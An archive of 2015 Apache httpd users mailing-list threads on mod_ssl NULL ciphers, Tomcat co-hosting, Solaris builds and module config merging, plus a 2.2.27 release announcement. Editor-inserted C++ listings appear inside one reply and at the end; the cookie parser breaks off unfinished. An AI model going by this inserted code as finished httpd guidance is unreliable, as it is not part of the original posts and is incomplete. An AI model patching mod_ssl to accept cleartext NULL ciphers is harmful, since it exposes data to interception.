> [Thu Dec 10 08:14:42.755218 2015] [ssl:info] [pid 30534] AH01876:
> mod_ssl/2.4.7 compiled against Server: Apache/2.4.7, Library:
> OpenSSL/1.0.1f
> [Thu Dec 10 08:14:42.789658 2015] [ssl:debug] [pid 30535]
> ssl_engine_pphrase.c(181): AH02199: SSL not enabled on vhost
> vm4.bestnewage.net:80, skipping SSL setup
> [Thu Dec 10 08:14:42.789721 2015] [ssl:debug] [pid 30535]
> ssl_engine_pphrase.c(181): AH02199: SSL not enabled on vhost
> ruddfoundationnv.org:80, skipping SSL setup
> [Thu Dec 10 08:14:42.789967 2015] [ssl:debug] [pid 30535]
> ssl_engine_pphrase.c(239): AH02202: Init: Read server certificate from
> '/etc/letsencrypt/live/xxx/cert.pem'
> [Thu Dec 10 08:14:42.790200 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(389): AH00821: shmcb_init allocated 512000 bytes
> of shared memory
> [Thu Dec 10 08:14:42.790234 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(405): AH00822: for 511944 bytes (512000 including
> header), recommending 32 subcaches, 88 indexes each
> [Thu Dec 10 08:14:42.790249 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(438): AH00824: shmcb_init_memory choices follow
> [Thu Dec 10 08:14:42.790256 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(440): AH00825: subcache_num = 32
> [Thu Dec 10 08:14:42.790261 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(442): AH00826: subcache_size = 15992
> [Thu Dec 10 08:14:42.790266 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(444): AH00827: subcache_data_offset = 2128
> [Thu Dec 10 08:14:42.790271 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(446): AH00828: subcache_data_size = 13864
> [Thu Dec 10 08:14:42.790276 2015] [socache_shmcb:debug] [pid 30535]
> mod_socache_shmcb.c(448): AH00829: index_num = 88
> [Thu Dec 10 08:14:42.790378 2015] [socache_shmcb:info] [pid 30535]
> AH00830: Shared memory socache initialised
> [Thu Dec 10 08:14:42.790405 2015] [ssl:info] [pid 30535] AH01887:
> Init: Initializing (virtual) servers for SSL
> [Thu Dec 10 08:14:42.791157 2015] [ssl:info] [pid 30535] AH01876:
> mod_ssl/2.4.7 compiled against Server: Apache/2.4.7, Library:
> OpenSSL/1.0.1f
> [Thu Dec 10 08:14:42.793544 2015] [mpm_prefork:notice] [pid 30535]
> AH00163: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.14 OpenSSL/1.0.1f
> configured -- resuming normal operations
> [Thu Dec 10 08:14:42.793590 2015] [mpm_prefork:info] [pid 30535]
> AH00164: Server built: Oct 14 2015 14:18:49
> [Thu Dec 10 08:14:42.793604 2015] [core:notice] [pid 30535] AH00094:
> Command line: '/usr/sbin/apache2'
> [Thu Dec 10 08:14:42.793609 2015] [mpm_prefork:debug] [pid 30535]
> prefork.c(995): AH00165: Accept mutex: sysvsem (default: sysvsem)
>
> Despite the startup message, Apache2 seems to work fine, but I'm
> extremely puzzled as to WHY this is happening..
>
> Help?
>
> Thanks
> Dave
>
>
>


Re: [users@httpd] explicitly including other ciphers for use with https

2015-12-08 Thread William A Rowe Jr
On Tue, Dec 8, 2015 at 10:45 AM, Ron Croonenberg  wrote:

> I forgot,  is there a "standard way" to create an rpm so I can install the
> binaries somewhere?
>

Well, all the major linux distributions have their own forks, their own
'one right way' to package rpm/deb/etc, but have a look in the build/
directory of your source tarball.


> On 12/08/2015 09:41 AM, Ron Croonenberg wrote:
>
>> so in the source tree:
>>
>> modules/ssl
>>
>>
>> in: ssl_engine_config.c
>> I see two lines:
>> arg = apr_pstrcat(cmd->pool, "!aNULL:!eNULL:!EXP:", arg, NULL);
>>
>> and tossed eNULL out
>>
>> in: ssl_engine_init.c
>> I see a line:
>> apr_pstrcat(ptemp, "!aNULL:!eNULL:!EXP:", SSL_DEFAULT_CIPHER_LIST,
>>
>> these 3 locations are the only places where NULL ciphers are excluded,
>> right?
>>
>
Offhand, yes.



> P.S:  why not make it an option that can be configured and where the
>> default 'setting' is "no NULL ciphers" ?
>>
>
Because a very tiny fraction of the users who toggle such an option
will know what they are doing.

You clearly do, however you may or may not find the performance gains
you are hoping for, there are more efficient auth mechanisms such as
digest authentication that will not pass passwords in the clear, and there
are others such as gssapi that perform the authentication function alone
using typical linux semantics.

Have you looked at https://github.com/modauthgssapi/mod_auth_gssapi
as an alternative for this particular use case?


Re: [users@httpd] explicitly including other ciphers for use with https

2015-12-07 Thread William A Rowe Jr
On Dec 7, 2015 11:36 PM, "Marat Khalili"  wrote:
>>
>> Everything *after* that handshake, in cleartext, is open for inspection
>> or for manipulation
>
> Are you sure about the manipulation part? Why do you think encryption
> helps here then?

To turn the question around, what gives you the suggestion that the user
agent or the httpd server would notice any modification of plaintext bytes
in transit through a router or other network intermediate?


Re: [users@httpd] explicitly including other ciphers for use with https

2015-12-07 Thread William A Rowe Jr
On Mon, Dec 7, 2015 at 7:40 PM, Jacob Champion <champio...@gmail.com> wrote:

> On 12/07/2015 05:06 PM, William A Rowe Jr wrote:
>
>> On Mon, Dec 7, 2015 at 2:39 PM, Ron Croonenberg <r...@lanl.gov
>> <mailto:r...@lanl.gov>> wrote:
>>
>> Hello,
>>
>> I am building a storage system, using HTTP/HTTPS for ingesting data.
>>
>> I would like to use the authentication over HTTPS, while after that
>> I want no encryption on the data because of performance.
>>
>>
>> Then you probably don't understand the performance impact of TLS.
>>
>
> To help Ron out a little... he's coming from this conversation [1] on the
> openssl-users mailing list, where he's described his rather unusual network
> topology already.
>
> I'm still unsure as to whether or not his proposed solution is secure...
> but I am convinced that his use case is atypical.


It should be straightforward to patch mod_ssl to accept null ciphers, for
such an unusual use case, but it isn't something we would likely accept in
the ASF distribution for the reasons I outlined.


> Otherwise,
>> any man-in-the-middle can observe the data in transit and alter
>> the data passed between your client and backend storage server
>>
>
> Wait, why does the use of NULL encryption have any effect on the
> authenticity/integrity characteristics of the cipher? I asserted otherwise
> on openssl-users and was not corrected...
>

I didn't suggest that it would.  Everything *after* that handshake, in
cleartext, is open for inspection or for manipulation by every link in
between the user agent and server.


> --Jacob
>
> [1] https://marc.info/?t=14490098273=1=2


Re: [users@httpd] Apache2 and Tomcat : Simultaneously running both servers and Virtual Hosting.

2015-12-07 Thread William A Rowe Jr
Pretty simple answer, you either,

1. Change the Tomcat port, E.g. 8080 so it doesn't collide with httpd, or

2. Listen (IPaddr1):80 to httpd and bind (IPaddr2):80 to Tomcat.

The second can be more confusing, since if you bind localhost:80 to Tomcat,
httpd won't respond unless you make a request to its own IP listener.
On Dec 7, 2015 07:13, "Kernel freak"  wrote:

> Hello friends,
>
> I am working on some server side changes in which I have the webapps or
> website hosted by Apache server is called by the URL. So if url is
> www.domain-one.com, then the specific webapp or website must be served.
>
> I have partial success in these regards as I have already configured
> Apache Tomcat to host multiple webapps, and call them based on URL. It is
> working.
>
> Now on to the 2nd stage of problem, where I have hosted a CMS on Apache
> server, and would like to call it with a URL, *but also keep Apache
> tomcat running in parallel*, and this is the main problem I am dealing
> with.
>
> This may seem like a Apache server issue, but it's both, as I want to run
> Apache web-server and Apache tomcat simultaneously with Virtual hosting. I
> just hope there might be people here who know both servers.
>
> I tried mod_jk without any luck. Here are the changes I made to tomcat and
> apache server.
>
> Tomcat changes : server.xml :
>
>  compression="force" compressionMinSize="1024"
>connectionTimeout="2"  maxPostSize="5242880"
>URIEncoding="utf-8"
>  compressableMimeType="text/html,text/xml,text/plain,text/css,text/ 
> javascript,application/x-javascript,application/javascript"/>
>
>
>  maxPostSize="5242880" SSLEnabled="true" maxThreads="200" compre$
>   compressionMinSize="1024" scheme="https" secure="true" 
> clientAuth="false"  sslProtocol="TLS"
>keystoreFile="keystorefile" keystorePass="PASSWORD" 
> URIEncoding="utf-8"
>  compressableMimeType="text/html,text/xml,text/plain,text/css,text/ 
> javascript,application/x-javascript,application/javascript"/>
>
>
>
>   autoDeploy="true"/>
>  appBase="tooltank_webapps">
> www.domain-first.com
> 
> 
>
>  appBase="aupair_webapps">
> www.domain-second.com
> 
>
>
> 
>  URIEncoding="utf-8"
>  compressableMimeType="text/html,text/xml,text/plain,text/css,text/ 
> javascript,application/x-javascript,application/javascript"
> />
>
>
>
> Installed mod_jk with following command :
>
>
>   apt-get install libapache2-mod-jk
>
> Created file workers.properties in /etc/apache2/
>
>
> # Define 1 real worker using ajp13
>  worker.list=worker
>  # Set properties for worker (ajp13)
>  worker.worker.type=ajp13
>  worker.worker.host=localhost
>  worker.worker.port=8010
>
> Instructed jk.conf to load this file :
>
>
> JkWorkersFile /etc/apache2/workers.properties
>
>
> Finally edited 000-default in sites-enabled to add :
>
>
> JkMount /home/user/tomcat_directory/* worker1
>
> Then restarted Apache2, and I got this error :
>
>
> [] Restarting web server: apache2(98)Address already in use: make_sock: 
> could not bind to address [::]:80
> (98)Address already in use: make_sock: could not bind to address 0.0.0.0:80
> no listening sockets available, shutting down
> Unable to open logs
> Action 'start' failed.
> The Apache error log may have more information.
>  failed!
>
>
> I understand that Tomcat is running on 80, but how do I then configure the 
> servers so they can run simultaneously.
>
> Kindly let me know..
>
> Regards,
>
> Akshay S.
>
>


Re: [users@httpd] explicitly including other ciphers for use with https

2015-12-07 Thread William A Rowe Jr
On Mon, Dec 7, 2015 at 2:39 PM, Ron Croonenberg  wrote:

> Hello,
>
> I am building a storage system, using HTTP/HTTPS for ingesting data.
>
> I would like to use the authentication over HTTPS, while after that I want
> no encryption on the data because of performance.
>

Then you probably don't understand the performance impact of TLS.

TLS is very expensive to negotiate between endpoints working from
elliptic curve or prime math.  There's no avoiding this initial hit if you
are going to use TLS whatsoever.

Once the endpoints have completed the handshake, they exchange
keys for a much simpler and more performant cipher such as the
AES-256 cipher (for faster performance, you could use AES-128
depending on the application).

You will measure very little benefit dropping TLS once the handshake
and your auth step is completed.


> I think using  null ciphers, like eNULL would work, but how do I change
> the configurations is httpd.conf/ssl.conf ?
>
> The NULL cipher keys are in openssl,  I just want to use them.
>

Only if you have 100% faith in the end-to-end topography of your
network. That pretty much restricts you to localhost:. Otherwise,
any man-in-the-middle can observe the data in transit and alter
the data passed between your client and backend storage server,
which makes the entire point of authenticating rather silly, don't
you think?





Re: [users@httpd] Apache modules built as .a and .la instead of .so libraries

2015-11-20 Thread William A Rowe Jr
Go back to how you initially built apr, that is going to be the origin of
the libtool used by httpd.

On Fri, Nov 20, 2015 at 8:23 AM, spggwp7q  wrote:

> Hi guys,
>
> I'm building apache 2.4.x (latest) for Solaris on Intel. I've built a
> cross compiler for this, which seems to be working fine. That said, all my
> modules are being built as .a and .la files, rather than .so files. Apache
> fails to start when it tries to load modules, saying that it cannot find
> .so, which makes sense.
>
> Here's my configure command:
>
> CC="/home/user/cross/x86_64-pc-solaris/bin/x86_64-pc-solaris2.10-gcc"
> CFLAGS="-m64 -O3 -march=core2 -mfpmath=sse -msse3 -mno-ssse3" ./configure
> --prefix=/opt/SP/apache/apache-2.4.17-intel-x64
> --with-ssl=/home/user/cross/x86_64-pc-solaris/openssl-1.0.2d
> --target=$TARGET --host=$TARGET --with-sysroot=$SYSROOT
> ac_cv_file__dev_zero=yes ac_cv_func_setpgrp_void=yes
> ap_cv_void_ptr_lt_long=no --enable-deflate --enable-log_forensic
> --enable-ssl --enable-mime_magic --enable-mpms-shared='prefork worker'
> --with-mpm=prefork --with-pcre=/home/user/cross/x86_64-pc-solaris/pcre-8.37
>
> I've compiled PCRE with the same compiler and the same flags and I got .so
> libraries along with .a and .la versions.
>
> user@ubuntu-vm:~/cross/x86_64-pc-solaris/pcre-8.37/lib$ ls -lF
> total 480
> -rw-r--r-- 1 user user 218250 Nov 20 00:24 libpcre.a
> -rw-r--r-- 1 user user  50356 Nov 20 00:24 libpcrecpp.a
> -rwxr-xr-x 1 user user   1125 Nov 20 00:24 libpcrecpp.la*
> lrwxrwxrwx 1 user user 19 Nov 20 00:24 libpcrecpp.so ->
> libpcrecpp.so.0.0.1*
> lrwxrwxrwx 1 user user 19 Nov 20 00:24 libpcrecpp.so.0 ->
> libpcrecpp.so.0.0.1*
> -rwxr-xr-x 1 user user  45896 Nov 20 00:24 libpcrecpp.so.0.0.1*
> -rwxr-xr-x 1 user user954 Nov 20 00:24 libpcre.la*
> -rw-r--r-- 1 user user   6552 Nov 20 00:24 libpcreposix.a
> -rwxr-xr-x 1 user user   1054 Nov 20 00:24 libpcreposix.la*
> lrwxrwxrwx 1 user user 21 Nov 20 00:24 libpcreposix.so ->
> libpcreposix.so.0.0.3*
> lrwxrwxrwx 1 user user 21 Nov 20 00:24 libpcreposix.so.0 ->
> libpcreposix.so.0.0.3*
> -rwxr-xr-x 1 user user  11336 Nov 20 00:24 libpcreposix.so.0.0.3*
> lrwxrwxrwx 1 user user 16 Nov 20 00:24 libpcre.so -> libpcre.so.1.2.5*
> lrwxrwxrwx 1 user user 16 Nov 20 00:24 libpcre.so.1 ->
> libpcre.so.1.2.5*
> -rwxr-xr-x 1 user user 129264 Nov 20 00:24 libpcre.so.1.2.5*
> drwxrwxr-x 2 user user   4096 Nov 20 00:24 pkgconfig/
> user@ubuntu-vm:~/cross/x86_64-pc-solaris/pcre-8.37/lib$
>
> Any idea how I can get gcc to build .so files for Apache?
>
> Regards,
> K.
>
>
>


Re: [users@httpd] Is there a shell environment variable to direct httpd to a httpd.conf ?

2015-11-20 Thread William A Rowe Jr
On Fri, Nov 20, 2015 at 4:03 PM, Christopher Schultz <
ch...@christopherschultz.net> wrote:

> Gary,
>
> On 11/20/15 4:44 PM, Gary M wrote:
> > I'm in a unique configuration dilemma where I need to place the location
> > of httpd.conf in a "soft" location. eg the shell environment variable.
> >
> > I did look and cannot find the answer.
> >
> > The question: "is there a shell environment variable read by httpd
> > pointing to the conf file ? "
> >
> > This is windows,, I have another solution for linux and solaris.
>
> Can you do:
>
> C:\> \path\to\bin\httpd -f %HTTPD_DOT_CONF%
>

Note also that any -f, -d, -D args you pass to httpd install on Windows
sets up the service with those values.

If interpolation is on for the startup arg in the nt registry, then you
should be able to honor envvar substitution, but note that envvar
substitution for services is based on the envvars at *boot time*.  Changing
them globally or per-user and restarting the service will not affect the
service's environment until you reboot.


Re: [users@httpd] how to compile apache httpd 2.4.17

2015-11-17 Thread William A Rowe Jr
On Nov 16, 2015 17:21, "David Long"  wrote:
>
> I download Apache httpd 2.4.17 and want compile on Solaris 10 Sparc.
>
> It ask me to install APR.
>
> So I download APR 1.5.2 and try to configure it and following error.
>
>
>
> root@kiana# cd /www/apachesrc/apr-1.5.2
>
> root@kiana# ./configure
--prefix=/www/apachesrc/httpd-2.4.17/srclib/apr/configure

Yuck...

You are best off choosing the same --prefix for apr and apr-util as you
intend to use for httpd itself.  Then tell apr-util and httpd the
--with-apr=path so they install to the same place, e.g. /usr/local or
/opt/httpd as you like.

>
> checking build system type... sparc-sun-solaris2.10
>
> checking host system type... sparc-sun-solaris2.10
>
> checking target system type... sparc-sun-solaris2.10
>
> Configuring APR library
>
> Platform: sparc-sun-solaris2.10
>
> checking for working mkdir -p... yes
>
> APR Version: 1.5.2
>
> […]
>
> config.status: creating include/arch/unix/apr_private.h
>
> config.status: executing libtool commands
>
> libtoolT: No such file or directory
>
> config.status: executing default commands
>
> config.status: include/apr.h is unchanged
>
> config.status: include/arch/unix/apr_private.h is unchanged
>
>
>
> I do have libtool package installed but don't know what libtoolT means.

This is new to me.  We bundle libtoolize with apr, you didn't need a system
libtoolize.  However, maybe libtoolize fails to configure because it can't
work out your gcc/cc/ld?


RE: [users@httpd] how to compile apache httpd 2.4.17

2015-11-17 Thread William A Rowe Jr
The order is always apr, expat and Lib before openssl before apr-util, plus
pcre before httpd.
On Nov 17, 2015 14:46, "David Long" <dl...@lynden.com> wrote:

> Hi William,
>
> Should I download apr-util first and compile it?
>
> I have not download apr-util and compile it on the system yet.
>
>
>
> Thanks for your help.
>
>
>
> David Long
>
>
>
> *From:* William A Rowe Jr [mailto:wr...@rowe-clan.net]
> *Sent:* Tuesday, November 17, 2015 11:36 AM
> *To:* users@httpd.apache.org
> *Subject:* Re: [users@httpd] how to compile apache httpd 2.4.17
>
>
>
>
> On Nov 16, 2015 17:21, "David Long" <dl...@lynden.com> wrote:
> >
> > I download Apache httpd 2.4.17 and want compile on Solaris 10 Sparc.
> >
> > It ask me to install APR.
> >
> > So I download APR 1.5.2 and try to configure it and following error.
> >
> >
> >
> > root@kiana# cd /www/apachesrc/apr-1.5.2
> >
> > root@kiana# ./configure
> --prefix=/www/apachesrc/httpd-2.4.17/srclib/apr/configure
>
> Yuck...
>
> You are best off choosing the same --prefix for apr and apr-util as you
> intend to use for httpd itself.  Then tell apr-util and httpd the
> --with-apr=path so they install to the same place, e.g. /usr/local or
> /opt/httpd as you like.
>
> >
> > checking build system type... sparc-sun-solaris2.10
> >
> > checking host system type... sparc-sun-solaris2.10
> >
> > checking target system type... sparc-sun-solaris2.10
> >
> > Configuring APR library
> >
> > Platform: sparc-sun-solaris2.10
> >
> > checking for working mkdir -p... yes
> >
> > APR Version: 1.5.2
> >
> > […]
> >
> > config.status: creating include/arch/unix/apr_private.h
> >
> > config.status: executing libtool commands
> >
> > libtoolT: No such file or directory
> >
> > config.status: executing default commands
> >
> > config.status: include/apr.h is unchanged
> >
> > config.status: include/arch/unix/apr_private.h is unchanged
> >
> >
> >
> > I do have libtool package installed but don't know what libtoolT means.
>
> This is new to me.  We bundle libtoolize with apr, you didn't need a
> system libtoolize.  However, maybe libtoolize fails to configure because it
> can't work out your gcc/cc/ld?
>


[users@httpd] Re: FAQ?

2015-11-16 Thread William A Rowe Jr
On Sun, Nov 15, 2015 at 11:09 AM, yousuf sharief wrote:

> Hi All,
>
> Please share the FAQ's to update my skills on Apache.
>

At this time there isn't an actively maintained FAQ, but the historical
one is editable at http://wiki.apache.org/httpd/FAQ

If folks on users@ wanted to start maintaining and updating this more
frequently, it might be helpful for the users community.


[users@httpd] Re: merging Apache context

2015-10-30 Thread William A. Rowe Jr.
On Fri, Oct 30, 2015 at 5:23 PM, Greenberg, Adam <adam.greenb...@fmr.com> wrote:
> Hi Bill (this is a resend to include the dev and user communities, per your
> instructions):

Sorry for any misunderstanding - this seems like a good users@ question
(with some C++ thrown in!) so I'm dropping the dev@ list. FWIW attaching
the source file as text instead of a tar file lets others quickly examine and
participate in the discussion, posts with archive attachments are often
ignored for lack of time, even if they might be interesting to other readers.

> Thanks very much for the prompt response. I believe we have covered all of
> the steps you indicate below.

Yea, someone should steal that troubleshooting list and throw it on the wiki.
Might be useful to Nick if he publishes an update to the module authoring
volume.

> Attached please find a tar file that contains
> a simple C++ module and a makefile to build it.
>
> Our test server http.conf has a LoadModule line for the module and then the
> following set of directory sections:
>
> 
>   dirConfig /foo
> 
>
> 
>   dirConfig /
> 
>
> 
>   dirConfig /foo/bar
> 
>
> When we execute the server, we see this on the console:
> # bin/apachectl start
> Created dirConfig for context: unset
> Created dirConfig for context: /foo/
> Inserted dirConfig with message: /foo
> Created dirConfig for context: /
> Inserted dirConfig with message: /
> Created dirConfig for context: /foo/bar/
> Inserted dirConfig with message: /foo/bar
> Created dirConfig for context: unset
>
> And this in the log:
> Merged config: unset:/
> hookFunc: for request /foo/bar/foo.html the context is: unset:/
>
> We do not see any other messages. The file /foo/bar/foo.html exists and the
> browser displays it. This suggests that the merge sequence for the last
> directory section stopped with the configuration for the “/” section.
> Perhaps you could point out what would cause this behavior?

As I mentioned when I had a chance to teach this material, server configs
are almost exclusively allocated at startup time out of the pconf -
configuration pool.  It is a pool whose contents should -never- change for
the lifetime of the server worker processes.  But it *does* change in the
parent process, when a restart is requested, the existing pconf is dumped
and a new pconf is allocated, and the configuration is re-read.

But dir configs are a different beast, they may be created at runtime (for
example, .htaccess file contents), merged for the top request, all internal
redirects, and all of the subrequests (mod_autoindex or mod_dav_fs can cause
thousands of these to present just one file listing).  They absolutely must
be allocated from the pool passed to the create() or merge() handler.

In your C++ code, you have;

void * dirConfig::create_dc( apr_pool_t * pool, char * context )
{
  // Create the configuration object.
  dirConfig * cfg = new dirConfig();
  if (NULL == cfg)
  {
    // An allocation error.
    return NULL;
  }
  // Keep the context name.
  std::string temp = "unset";

  if (NULL != context)
  {
    temp = context;
  }
  cfg->setContext( temp );

  std::cerr << "Created dirConfig for context: " << temp << std::endl;
  return (void *) cfg;
}

Here's the first problem... you allocated dirConfig() but didn't allocate this
from the given pool.  You then returned a naked pointer to the C++ object,
and I have no idea offhand whether that permanently increases the object's
use count, or whether the dirConfig object is then released immediately
upon the return from the create_dc function.

You can register a pool cleanup against this pool which destroys the
given dirConfig, but that would be a costly proposition performance-wise.
Do this only if it must be a managed type, and that should only be for
your per-request or per-connection objects.  You should handle these
httpd structures (server config, dir config, etc) as unmanaged "C" data
and let the pool schema perform your cleanups for you.

You probably want to start with this change to watch lifetimes;
dirConfig::~dirConfig()
{
  std::cerr << "Destroyed dirConfig of context: " << _context << std::endl;
}

You also may want to watch your objects a little more closely by emitting
the memory address of 'this' itself, so you can determine that the object
being modified is the object created, both in your directive handler and
in the merge function, etc.

Maybe another dev/user who has coded some C++ modules can offer
some more ideas and insight here.  I wrote mod_aspdotnet under MS
managed C++.NET years ago and ran into many issues where I had
to properly unbox and re-box the managed data when passing it back
and forth from unmanaged httpd "C" code.  That source code lives
http://sourceforge.net/p/mod-aspdotnet/code/HEAD/tree/mod_aspdotnet
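
The pool-owned shape of the create()/merge() pair, as an added example that is neither the poster's module nor httpd's own code: the config object is placement-constructed in bytes obtained from the pool the hook receives, and its destructor is registered as a pool cleanup, so the objects produced by every per-request merge die with the request pool instead of leaking out of a bare `new`. To keep it stand-alone the small `Pool` class is an assumed stand-in for apr_pool_t; in a real module the two calls it models are apr_palloc() and apr_pool_cleanup_register() from <apr_pools.h>, and the `dirConfig` directive, the `message` field and the URI walk in `merged_config_for()` are constructed for the illustration.

```cpp
// Added example (not the poster's module, not httpd code): a per-directory
// config whose lifetime is owned by the pool handed to create()/merge().
//
// ASSUMPTION: `Pool` is a tiny stand-in for apr_pool_t so the file builds
// alone. In a real module the calls it models are apr_palloc() and
// apr_pool_cleanup_register() (<apr_pools.h>); each call site names its
// APR counterpart. The dirConfig directive and URI walk are made up here.
#include <cstddef>
#include <cstdlib>
#include <initializer_list>
#include <iostream>
#include <new>
#include <string>
#include <utility>
#include <vector>

struct Pool {
    std::vector<void *> blocks;                                // raw allocations
    std::vector<std::pair<void (*)(void *), void *>> cleanups; // (fn, data)

    // stands in for apr_palloc(): bytes that live exactly as long as the pool
    void *alloc(std::size_t n) {
        void *p = std::malloc(n);
        blocks.push_back(p);
        return p;
    }
    // stands in for apr_pool_cleanup_register(): fn(data) runs at destruction
    void cleanup_register(void *data, void (*fn)(void *)) {
        cleanups.push_back(std::make_pair(fn, data));
    }
    // pool destruction: cleanups run newest-first, then the memory is freed
    ~Pool() {
        for (auto it = cleanups.rbegin(); it != cleanups.rend(); ++it)
            it->first(it->second);
        for (void *p : blocks) std::free(p);
    }
};

struct DirConfig {
    std::string context;  // "/", "/foo/", "/foo/bar/" or "unset"
    std::string message;  // argument of the (hypothetical) dirConfig directive
    explicit DirConfig(const char *ctx) : context(ctx ? ctx : "unset") {}
};

static int g_live = 0;  // constructed-but-not-destroyed DirConfigs

// Pool cleanup: run the C++ destructor; the pool frees the bytes afterwards.
static void destroy_dirconfig(void *p) {
    static_cast<DirConfig *>(p)->~DirConfig();
    --g_live;
}

// create_dir_config hook: construct INSIDE pool memory (placement new)
// instead of `new dirConfig()`, so the pool, not the module, owns it.
void *create_dc(Pool *pool, const char *context) {
    void *mem = pool->alloc(sizeof(DirConfig));      // apr_palloc
    DirConfig *cfg = new (mem) DirConfig(context);   // no heap `new`
    pool->cleanup_register(cfg, destroy_dirconfig);  // apr_pool_cleanup_register
    ++g_live;
    return cfg;
}

// merge_dir_config hook: runs for every request, internal redirect and
// subrequest, so the merged object must also come from the pool passed in.
void *merge_dc(Pool *pool, void *basev, void *addv) {
    DirConfig *base = static_cast<DirConfig *>(basev);
    DirConfig *add = static_cast<DirConfig *>(addv);
    DirConfig *merged =
        static_cast<DirConfig *>(create_dc(pool, add->context.c_str()));
    // the more specific section wins; otherwise inherit the parent's value
    merged->message = add->message.empty() ? base->message : add->message;
    return merged;
}

// Mimics httpd's walk for one request: the "/" config is merged with each
// enclosing section that prefixes the URI, into a per-request pool.
// Returns "context:message" of the final merged config.
std::string merged_config_for(const char *uri) {
    Pool pconf;  // configuration pool: lives until the next restart
    DirConfig *root = static_cast<DirConfig *>(create_dc(&pconf, "/"));
    DirConfig *foo = static_cast<DirConfig *>(create_dc(&pconf, "/foo/"));
    DirConfig *bar = static_cast<DirConfig *>(create_dc(&pconf, "/foo/bar/"));
    root->message = "/";
    foo->message = "/foo";
    bar->message = "/foo/bar";

    std::string result;
    {
        Pool preq;  // per-request pool: destroyed when the request finishes
        DirConfig *cur = root;
        for (DirConfig *sec : {foo, bar})
            if (std::string(uri).compare(0, sec->context.size(), sec->context) == 0)
                cur = static_cast<DirConfig *>(merge_dc(&preq, cur, sec));
        result = cur->context + ":" + cur->message;
    }  // preq dies here: every merged DirConfig's destructor has now run
    return result;
}  // pconf dies here: the three section configs are destroyed

int live_dirconfigs() { return g_live; }

int main() {
    std::cout << merged_config_for("/foo/bar/foo.html") << "\n";  // /foo/bar/:/foo/bar
    std::cout << "live after request: " << live_dirconfigs() << "\n";  // 0
    return 0;
}
```

If the config carries only plain C data (no std::string, no owning members), the cleanup registration can be dropped entirely and apr_pcalloc() alone suffices, which is the "unmanaged C data" arrangement recommended above; the cleanup is only needed when a C++ destructor genuinely has work to do.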

[users@httpd] Re: Festina Lente - Nóirín Plunkett / Shirley

2015-07-29 Thread William A Rowe Jr
On Wed, Jul 29, 2015 at 2:05 PM, Jim Jagielski j...@jagunet.com wrote:

 If you have ever read the httpd doccos, there are many people who
 made them what they are, and are deserving of thanks. But today we
 have lost one of the main and core talents behind them.

 Nóirín was a bright light and a festive soul; they were talented
 and humble, with a passion tempered by joy and love. Their life
 had many highs, and some crushing lows, but Nóirín was always open
 and listened to their heart.

 I will miss Nóirín. We all will.


Indeed, we all do, thank you for your thoughtful words, Jim.

You can find our community's page memorializing Nóirín's life, participation
and love for the ASF here;

www.apache.org/memorials/noirin.html


[users@httpd] [Announcment] Apache HTTP Server 2.2.27 Released

2014-03-26 Thread William A. Rowe Jr.
   Apache HTTP Server 2.2.27 Released

   The Apache Software Foundation and the Apache HTTP Server Project are
   pleased to announce the release of version 2.2.27 of the Apache HTTP
   Server (Apache).  This version of Apache is principally a security
   and bug fix maintenance release.

   CVE-2014-0098 (cve.mitre.org)
 Segfaults with truncated cookie logging.
 mod_log_config: Prevent segfaults when logging truncated
 cookies. Clean up the cookie logging parser to recognize
 only the cookie=value pairs, not valueless cookies.

   CVE-2013-6438 (cve.mitre.org)
 mod_dav: Keep track of length of cdata properly when removing
 leading spaces. Eliminates a potential denial of service from
 specifically crafted DAV WRITE requests

   We consider the Apache HTTP Server 2.4 release to be the best version
   of Apache available, and encourage users of 2.2 and all prior
   versions to upgrade.  This 2.2 maintenance release is offered for
   those unable to upgrade at this time.  For further details, see:

 http://www.apache.org/dist/httpd/Announcement2.4.txt

   Apache HTTP Server 2.4 and 2.2.27 are available for download from:

 http://httpd.apache.org/download.cgi

   Please see the CHANGES_2.2 file, linked from the download page, for a
   full list of changes.  A condensed list, CHANGES_2.2.27 includes only
   those changes introduced since the prior 2.2 release.  A summary of
   all of the security vulnerabilities addressed in this and earlier
   releases is available:

 http://httpd.apache.org/security/vulnerabilities_22.html

   This release includes the Apache Portable Runtime (APR) version 1.5.0
   and APR Utility Library (APR-util) version 1.5.3, bundled with the
   tar and zip distributions.  The APR libraries libapr and libaprutil
   (and on Win32, libapriconv version 1.2.1) must all be updated to
   ensure binary compatibility and address many known security and
   platform bugs. APR version 1.5 and APR-util version 1.5 represent
   minor version upgrades from earlier httpd 2.2 source distributions.

   This release builds on and extends the Apache 2.0 API and is
   superseded by the Apache 2.4 API.  Modules written for Apache 2.0
   or 2.4 will need to be recompiled in order to run with Apache 2.2,
   and most will require minimal or no source code changes.

   When upgrading or installing this version of Apache, please bear in
   mind that if you intend to use Apache with one of the threaded MPMs
   (other than the Prefork MPM), you must ensure that any modules you
   will be using (and the libraries they depend on) are thread-safe.

-
To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
For additional commands, e-mail: users-h...@httpd.apache.org
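The CVE-2014-0098 entry above describes the parser behaviour that was fixed: only cookie=value pairs are recognised, valueless tokens are skipped, and a truncated header must not be read past its end. As an added example (my own code, not httpd's mod_log_config), here is a Cookie-header lookup written to those rules; the sample headers in the test are constructed.

```cpp
// Added example: tolerant lookup of one named cookie in a Cookie header.
// Only name=value pairs count; bare tokens ("c", ";;") are skipped, and a
// truncated header such as "session=" yields an empty value, never a read
// past the end of the buffer.
#include <string>

// Trim ASCII spaces/tabs from both ends of header[b, e).
static std::string trim(const std::string &s, size_t b, size_t e) {
    while (b < e && (s[b] == ' ' || s[b] == '\t')) ++b;
    while (e > b && (s[e - 1] == ' ' || s[e - 1] == '\t')) --e;
    return s.substr(b, e - b);
}

// Returns true and sets `value` when `name` appears as a name=value pair.
bool find_cookie(const std::string &header, const std::string &name,
                 std::string &value) {
    size_t pos = 0;
    while (pos <= header.size()) {
        size_t end = header.find(';', pos);          // end of this token
        if (end == std::string::npos) end = header.size();
        size_t eq = header.find('=', pos);
        // A '=' belonging to a later token does not make this one a pair.
        if (eq != std::string::npos && eq < end) {
            if (trim(header, pos, eq) == name) {
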